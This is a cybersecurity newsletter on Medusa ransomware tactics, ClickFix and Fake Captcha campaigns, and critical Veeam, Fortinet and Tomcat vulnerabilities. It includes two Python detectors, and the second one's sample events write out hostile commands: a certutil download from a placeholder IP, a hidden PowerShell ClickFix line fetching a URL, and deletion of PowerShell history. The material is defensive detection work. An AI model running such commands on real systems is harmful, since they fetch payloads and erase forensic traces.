Cyber Threat Intelligence Report

This week we briefed our clients on a #StopRansomware advisory on Medusa and campaigns we've seen from ClickFix and Fake Captcha.

 

KEY TAKEAWAYS

  • New #StopRansomware advisory from CISA and FBI for Medusa RaaS. Learn the group’s TTPs so you can protect your organization.

  • ClickFix and FakeCaptcha attacks are here to stay for 2025.

  • Critical vulnerabilities in Veeam, Fortinet, and Apache Tomcat. Patch now!




 

Medusa Ransomware TTPs

This month, CISA and the FBI released a joint #StopRansomware advisory for Medusa, a double extortion ransomware-as-a-service (RaaS) group first identified in June 2021. In recent months, the group has been gaining momentum, impacting over 300 organizations across a variety of industry verticals including medical, education, legal, insurance, technology, and manufacturing. This Medusa ransomware variant should not be confused with MedusaLocker or the Medusa mobile malware variant.

 

Initial Access

Medusa has been observed using both phishing and remote exploitation to gain initial access. Phishing is used simply to harvest the victim's credentials for remote access. For remote exploitation, the group has been observed leveraging known vulnerabilities such as CVE-2024-1709 (authentication bypass in ScreenConnect) and CVE-2023-48788 (SQL injection in Fortinet EMS).

 

Network Discovery

Once Medusa has a foothold in the target environment, they use living-off-the-land (LOTL) and other legitimate tools such as Advanced IP Scanner and SoftPerfect Network Scanner for enumeration. Medusa tends to restrict their scans to common ports and services, such as 21/FTP, 22/SSH, 23/Telnet, 80/HTTP, 115/SFTP, 443/HTTPS, 1433/SQL, 3050/Firebird, 3128/HTTP proxy, 3306/MySQL, and 3389/RDP.
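Because the scanning scope above is so narrow, it is a usable detection signal: one internal source reaching several of those ports across many hosts in a short window stands out from normal client traffic. The detector below is an added example written for this report, not PacketWatch's or CISA's code; the flow records are constructed, and the five-minute window and host/port thresholds are assumptions to tune against your own baseline (vulnerability scanners and monitoring hosts will trip it and belong on an allow-list).

```python
"""Flag the focused port sweep the advisory attributes to Medusa: one source
touching several of the listed service ports across many hosts within a short
window. Added example; flow data is constructed, thresholds are assumptions."""

from collections import defaultdict
from datetime import datetime, timedelta

# Ports the advisory lists as Medusa's usual scanning scope.
MEDUSA_SCAN_PORTS = {21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389}

# Constructed flow export, one record per line: "timestamp src dst dport proto".
SAMPLE_FLOWS = """\
2025-03-17T09:00:01 10.0.5.23 10.0.5.10 443 tcp
2025-03-17T09:00:02 10.0.5.23 10.0.5.1 53 udp
2025-03-17T09:00:05 10.0.5.23 10.0.5.10 445 tcp
2025-03-17T09:01:00 10.0.5.77 10.0.5.10 22 tcp
2025-03-17T09:01:01 10.0.5.77 10.0.5.10 3389 tcp
2025-03-17T09:01:02 10.0.5.77 10.0.5.11 22 tcp
2025-03-17T09:01:03 10.0.5.77 10.0.5.11 1433 tcp
2025-03-17T09:01:04 10.0.5.77 10.0.5.12 80 tcp
2025-03-17T09:01:05 10.0.5.77 10.0.5.12 3389 tcp
2025-03-17T09:01:06 10.0.5.77 10.0.5.13 22 tcp
2025-03-17T09:01:07 10.0.5.77 10.0.5.14 3389 tcp
2025-03-17T09:01:08 10.0.5.77 10.0.5.15 1433 tcp
2025-03-17T09:02:30 10.0.5.23 10.0.5.20 443 tcp
2025-03-17T09:03:10 10.0.5.23 10.0.5.20 3389 tcp
2025-03-17T09:40:00 10.0.5.77 10.0.5.30 22 tcp
2025-03-17T09:40:01 10.0.5.77 10.0.5.31 22 tcp
"""


def parse_flows(text):
    """Parse the constructed export into (time, src, dst, dport, proto) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport), proto))
    return flows


def detect_port_sweeps(flows, window=timedelta(minutes=5), min_hosts=4, min_ports=3):
    """Return {src: {"hosts": n, "ports": [...]}} for every source that, within
    any `window`, reached at least `min_hosts` distinct hosts on at least
    `min_ports` distinct ports from MEDUSA_SCAN_PORTS. Only the widest window
    per source is reported."""
    by_src = defaultdict(list)
    for flow in flows:
        if flow[4] == "tcp" and flow[3] in MEDUSA_SCAN_PORTS:
            by_src[flow[1]].append(flow)

    alerts = {}
    for src, events in by_src.items():
        events.sort()  # timestamp is the first tuple field
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits in `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {e[2] for e in events[start:end + 1]}
            ports = {e[3] for e in events[start:end + 1]}
            if len(hosts) >= min_hosts and len(ports) >= min_ports:
                best = alerts.get(src)
                if best is None or len(hosts) > best["hosts"]:
                    alerts[src] = {"hosts": len(hosts), "ports": sorted(ports)}
    return alerts


if __name__ == "__main__":
    for src, info in detect_port_sweeps(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{src}: {info['hosts']} hosts on ports {info['ports']}")
```

On the constructed data only 10.0.5.77 is reported: the workstation 10.0.5.23 touches two hosts on two listed ports, and the scanner's later probe of two hosts falls outside the window and does not reopen the alert. The same logic runs over real NetFlow/IPFIX or Zeek `conn.log` exports once `parse_flows` is adapted to the field order.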

 

Defense Evasion

The group heavily relies on LOTL techniques to avoid detection. They use Certutil (certutil.exe) to download additional files and payloads. Medusa also heavily uses Base64-encoded PowerShell commands, and then deletes the PowerShell command line history. For command and control (C2), they use off-the-shelf tools such as Ligolo and Cloudflared to hide their activity.

 

Lateral Movement

Medusa uses a versatile range of remote access tools for lateral movement, shifting tools depending on what is available in the target network. They have been observed abusing AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop, as well as traditional RDP. The group will go so far as to run a batch script enabling RDP access on the local firewall. To harvest credentials for further privilege escalation and lateral movement, Medusa has been observed using Mimikatz for LSASS dumping.

 

Data Exfiltration and Encryption

Medusa typically uses Rclone to exfiltrate data to their C2 servers. In order to deploy their encryptor, gaze.exe, across the network, Medusa leverages LOTL tools such as PsExec, PDQ Deploy, or BigFix. The group will attempt to disable Windows Defender and other AV tools in the environment before the encryptor is detonated.

 

How to Protect Your Organization

Protecting your organization from threats like Medusa is similar to protecting against other ransomware threats:

  • Use strong passwords in combination with multi-factor authentication (MFA).
  • Keep operating systems and software up to date. Actively applying patches in a timely manner, especially to internet-facing assets, is crucial for preventing initial access.
  • Have fully up to date EDR tools deployed across all possible endpoints.
  • Use network monitoring tools such as PacketWatch to detect anomalous network traffic.
  • Implement robust network segmentation.
  • Disable unused ports and services.
  • Limit which accounts have administrative privileges (principle of least privilege).
  • Document and baseline usage of approved software to make LOTL and anomalous behavior easier to identify.
  • Maintain offline backups of data and regularly test and maintain these backups.

 

Resources:

 

NPSA: ClickFix & Fake Captcha are Here to Stay

Over the past 3 months, PacketWatch Threat Intelligence has documented ClickFix and Fake Captcha campaigns on 3 separate occasions [1][2][3]. Both attacks involve tricking the user into opening a command terminal and then pasting and executing malicious code copied over from the clipboard. With ClickFix, this site will give a fake error message, stating that to fix the problem the user needs to run the malicious command. With Fake Captcha, the user is presented with what looks like a "verify you are human" captcha portal, where they are instructed to run the malicious command to prove they are human. These tactics are becoming increasingly widespread and are being leveraged to deploy infostealer malware to large numbers of victims.

Just in the last 2 weeks, there have been several new campaigns reported:

  • A large set of WordPress sites were compromised to deliver Lumma Stealer.
  • A phishing campaign attributed to Storm-1865 where emails impersonating booking[.]com were using ClickFix to push infostealers and remote access trojans.
  • Over 100 auto dealership websites were compromised to display ClickFix errors, leading to the delivery of SectopRAT. PacketWatch directly observed this campaign and can confirm that MDR customers are protected from this infection chain.

Network monitoring and endpoint detection tools such as PacketWatch, deployed across all endpoints, can detect and block these intrusions. However, the most important tool in combating these types of social engineering attacks is user awareness training. ClickFix and Fake Captcha attacks are here to stay for 2025 and beyond, and all users should be made aware of what the attacks look like so they can avoid running the commands. Administrators can also take an additional step by disabling PowerShell and the Command Prompt via GPO.
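Both stories in this report come down to a shell being launched with a command line that should not look normal on a workstation: Medusa's Base64-encoded PowerShell, certutil downloads and PowerShell history deletion (Defense Evasion, above), and the ClickFix/Fake Captcha pattern of a user-launched shell that pulls from a URL. The detector below is an added example written for this report, not PacketWatch's code or any vendor's signature set. The key=value event format and the six sample events are constructed (the addresses are RFC 5737 documentation ranges), the rule names are invented, and the rules are heuristics meant to be tuned, not authoritative indicators; the encoded-command rule also decodes the payload so an analyst sees what was actually run.

```python
"""Heuristic detections over process-creation events for the LOTL patterns in
the report (encoded PowerShell, certutil download, PowerShell history wipe) and
the ClickFix/Fake Captcha launch pattern (explorer.exe spawning a shell with a
URL on its command line). Added example; events and rule names are constructed."""

import base64
import re

# Constructed key=value telemetry with quoted values; not real events.
SAMPLE_EVENTS = r"""
ts=2025-03-17T10:02:11 host=WS01 user="CORP\jdoe" parent=explorer.exe image=powershell.exe cmd="powershell -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="
ts=2025-03-17T10:05:40 host=SRV02 user="CORP\svc_backup" parent=cmd.exe image=certutil.exe cmd="certutil -urlcache -f http://203.0.113.10/update.bin C:\Windows\Temp\update.bin"
ts=2025-03-17T10:06:02 host=SRV02 user="CORP\svc_backup" parent=powershell.exe image=cmd.exe cmd="cmd /c del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
ts=2025-03-17T10:30:00 host=SRV02 user="NT AUTHORITY\SYSTEM" parent=services.exe image=powershell.exe cmd="powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"
ts=2025-03-17T11:15:09 host=WS07 user="CORP\asmith" parent=explorer.exe image=powershell.exe cmd='powershell -w hidden "http://203.0.113.55/verify" # I am not a robot - reCAPTCHA Verification ID: 7731'
ts=2025-03-17T11:20:45 host=WS07 user="CORP\asmith" parent=explorer.exe image=cmd.exe cmd="cmd /c ipconfig /all"
"""

# key=value, where the value is "double-quoted", 'single-quoted' or bare.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|\'([^\']*)\'|(\S+))')

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# followed by a Base64 token. "-ExecutionPolicy" does not match: 'x' is not c/n.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
DELETE_RE = re.compile(r"(?i)\b(del|erase|rm|remove-item)\b")

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
SHELL_IMAGES = PS_IMAGES | {"cmd.exe"}


def parse_events(text):
    """Turn each non-empty line into a dict of its key=value fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = {}
        for m in FIELD_RE.finditer(line):
            ev[m.group(1)] = next(v for v in m.groups()[1:] if v is not None)
        events.append(ev)
    return events


def decode_encoded_command(b64):
    """-EncodedCommand payloads are UTF-16LE; return None if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev):
    """Return [(rule, detail), ...] for every heuristic the event matches."""
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    hits = []
    if image in PS_IMAGES:
        m = ENC_RE.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            hits.append(("ENCODED_POWERSHELL", decoded or "<undecodable payload>"))
    if image == "certutil.exe" and "-urlcache" in cmd.lower():
        hits.append(("CERTUTIL_DOWNLOAD", cmd))
    if "consolehost_history.txt" in cmd.lower() and DELETE_RE.search(cmd):
        hits.append(("PS_HISTORY_WIPED", cmd))
    # ClickFix / Fake Captcha: the user pastes into Run or a terminal, so the
    # shell's parent is explorer.exe and the command line carries a URL.
    if parent == "explorer.exe" and image in SHELL_IMAGES and "http" in cmd.lower():
        hits.append(("CLICKFIX_RUN_DIALOG", cmd))
    return hits


def detect(events):
    """Flatten rule hits into alert dicts, preserving event order."""
    return [
        {"ts": ev.get("ts"), "host": ev.get("host"), "rule": rule, "detail": detail}
        for ev in events
        for rule, detail in evaluate(ev)
    ]


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['ts']} {alert['host']} {alert['rule']}: {alert['detail']}")
```

On the sample, the scheduled inventory script (parent services.exe, `-ExecutionPolicy`) and the user's `ipconfig` produce no alerts, while the other four events each trip exactly one rule; the encoded payload decodes to the harmless `Get-Date` used here as a stand-in. In production these rules belong in the EDR or SIEM rather than a script, and the explorer.exe heuristic needs an allow-list for users who legitimately launch shells with URLs.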


 

Resources:

 

 

Vulnerability Roundup

 

Critical RCE in Veeam Backup & Replication

On March 19, Veeam published a security advisory for a new critical remote code execution (RCE) vulnerability, tracked as CVE-2025-23120, that affects Backup & Replication systems that are domain joined. Per the advisory, all supported versions of Backup & Replication are affected. While no proof-of-concept code has yet been observed in the wild, administrators are urged to upgrade to version 12.3.1 (build 12.3.1.1139) or higher as soon as possible.

 


Fortinet Vulnerability Under Active Exploitation

Last week, CISA added CVE-2025-24472 to their Known Exploited Vulnerabilities (KEV) catalog. This vulnerability and CVE-2024-55591 are a pair of critical authentication bypass vulnerabilities disclosed earlier this year that are often abused together to gain super-admin privileges on affected FortiOS and FortiProxy versions:

  • FortiOS 7.0.0 through 7.0.16 (Upgrade to 7.0.17 or above)
  • FortiProxy 7.2.0 through 7.2.12 (Upgrade to 7.2.13 or above)
  • FortiProxy 7.0.0 through 7.0.19 (Upgrade to 7.0.20 or above)

Administrators are urged to apply updates as soon as possible if they have not already done so. Additionally, it is highly recommended to disable management interface access from the open internet and restrict access to trusted IP addresses only.

 

Apache Tomcat RCE Under Active Exploitation

A critical remote code execution flaw in Apache Tomcat was disclosed on March 10, 2025. Tracked as CVE-2025-24813, the vulnerability allows an unauthenticated remote attacker to view or modify the content of files on the server. Affected versions are Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98. For the exploit to work, the following conditions must be met:

  • Writes enabled for the default servlet (readonly="false"; disabled by default).
  • Support for partial PUT is enabled (enabled by default).
  • Security-sensitive uploads occur in a sub-directory of a public upload directory.
  • The attacker knows the names of security-sensitive files being uploaded.
  • These security-sensitive files are being uploaded using partial PUT.

Proof-of-concept code is in the wild, and the vulnerability is being actively exploited. Administrators are urged to apply updates as soon as possible. The vulnerability may also be mitigated by reverting the default servlet configuration to readonly="true", turning off partial PUT support, and avoiding storing security-sensitive files in a subdirectory of public upload paths.

 


 

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

 


NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.